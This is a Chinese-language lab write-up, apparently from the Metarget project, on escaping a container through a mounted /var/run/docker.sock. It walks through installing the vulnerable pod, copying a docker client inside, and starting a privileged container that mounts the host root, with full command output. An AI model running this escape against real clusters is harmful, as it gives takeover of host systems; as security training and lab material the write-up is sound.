【场景类型】
    容器逃逸 - 危险挂载     【背景介绍】
     Docker Socket是Docker守护进程监听的Unix域套接字,用来与守护进程通信——查询信息或下发命令。如果在攻击者可控的容器内挂载了该套接字文件(<font style="color:#DF2A3F;">/var/run/docker.sock</font>),可通过Docker Socket与Docker守护进程通信,发送命令创建并运行一个新的容器,将宿主机的根目录挂载到新创建的容器内部,完成简单逃逸 建】
    • 基础环境准备,任意版本的docker 
    1. $ ./metarget gadget install docker --version 18.03.1
    2. $ ./metarget gadget install k8s --version 1.16.5 --domestic
    1. root@zyliang:~/metarget# ./metarget cnv install mount-docker-sock
    2. docker already installed
    3. kubernetes already installed
    4. mount-docker-sock is going to be installed
    5. applying yamls/k8s_metarget_namespace.yaml
    6. applying vulns_cn/mounts/pods/mount-docker-sock.yaml
    7. mount-docker-sock successfully installed
    9. root@zyliang:~/metarget# kubectl get pod -n metarget 
    10. NAME                READY   STATUS    RESTARTS   AGE
    11. mount-docker-sock   1/1     Running   0          10s
    • 安装docker命令行客户端 
    1. #下载客户端并copy到容器
    2. root@zyliang:~# wget https://download.docker.com/linux/static/stable/x86_64/docker-17.03.0-ce.tgz
    3. root@zyliang:~# docker ps | grep sock
    4. b425667a1be5   ba6acccedd29                  "/bin/bash -c -- 'wh…"   4 minutes ago   Up 4 minutes              k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    5. 1b7ccc8e47bc   k8s.gcr.io/pause:3.1          "/pause"                 4 minutes ago   Up 4 minutes              k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    6. root@zyliang:~# docker cp docker-17.03.0-ce.tgz b425667a1be5:/
    7. Successfully copied 27.8MB to b425667a1be5:/
    9. root@zyliang:~# kubectl exec -ti mount-docker-sock -n metarget bash
    10. root@mount-docker-sock:/# ls
    11. bin  boot  dev  docker-17.03.0-ce.tgz  etc  home  lib  lib32  lib64  libx32  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
    13. root@mount-docker-sock:/# tar xf ./docker-17.03.0-ce.tgz
    14. root@mount-docker-sock:/# cd docker
    15. root@mount-docker-sock:/docker# ls
    16. docker  docker-containerd  docker-containerd-ctr  docker-containerd-shim  docker-init  docker-proxy  docker-runc  dockerd
    • 容器内docker ps,确认挂载docker.sock成功 
    1. root@mount-docker-sock:/docker# ./docker ps
    2. CONTAINER ID        IMAGE                         COMMAND                  CREATED             STATUS              PORTS               NAMES
    3. b425667a1be5        ba6acccedd29                  "/bin/bash -c -- '..."   7 minutes ago       Up 7 minutes                            k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    4. 1b7ccc8e47bc        k8s.gcr.io/pause:3.1          "/pause"                 7 minutes ago       Up 7 minutes                            k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    5. 1f21b8c613d5        ba6acccedd29                  "/bin/bash -c -- '..."   4 hours ago         Up 4 hours                              k8s_ubuntu_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0
    6. eaa6db463eea        k8s.gcr.io/pause:3.1          "/pause"                 4 hours ago         Up 4 hours                              k8s_POD_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0
    7. 336c2bef5a3f        5dd8f24429b4                  "kube-controller-m..."   45 hours ago        Up 45 hours                             k8s_kube-controller-manager_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_2
    8. ce01dda16af0        8d2e2e5a92ac                  "kube-scheduler --..."   45 hours ago        Up 45 hours                             k8s_kube-scheduler_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_2
    9. 81438fb18ba4        f03a23d55e57                  "/opt/bin/flanneld..."   45 hours ago        Up 46 hours                             k8s_kube-flannel_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1
    10. 879f271e40c5        70f311871ae1                  "/coredns -conf /e..."   45 hours ago        Up 46 hours                             k8s_coredns_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_1
    11. 3f0fae5accd1        628f0e52ae53                  "kube-apiserver --..."   45 hours ago        Up 46 hours                             k8s_kube-apiserver_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_1
    12. 8b3f58f3a00d        87a399dffea6                  "/usr/local/bin/ku..."   45 hours ago        Up 46 hours                             k8s_kube-proxy_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_1
    13. 8e348df66d56        303ce5db0e90                  "etcd --advertise-..."   45 hours ago        Up 46 hours                             k8s_etcd_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_1
    14. f290e34beede        70f311871ae1                  "/coredns -conf /e..."   45 hours ago        Up 46 hours                             k8s_coredns_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1
    15. b79655911a2c        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_1
    16. 2250007f5f66        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1
    17. f245faafd5f3        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1
    18. aaedfa1721d1        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_1
    19. 6d4d5b451730        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_2
    20. 2acaa76e2732        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_1
    21. 447554958f5b        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_1
    22. 7179398f9453        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_1
    23. 3a91b45e2ca5        dirtycowdockervdso_dirtycow   "/bin/bash"              2 days ago          Up 46 hours         1234/tcp            dirtycowdockervdso_dirtycow_run_1
    • 容器内启动一个挂载宿主机根目录的特权容器,完成逃逸 
    1. root@mount-docker-sock:/docker# ./docker run -it -v /:/host --privileged --name=sock-test ubuntu /bin/bash
    2. root@08554a1cd523:/# ls /host/
    3. bin   dev            etc   home        initrd.img.old  lib    lost+found  mnt  proc  run   srv       sys  usr  vmlinuz
    4. boot  dirtycow-vdso  evil  initrd.img  install         lib64  media       opt  root  sbin  swapfile  tmp  var  vmlinuz.old
    5. root@08554a1cd523:/# cat host/etc/hostname 
    6. zyliang
    【参考链接】

    https://github.com/Metarget/metarget/tree/master/writeups_cnv/mount-docker-sock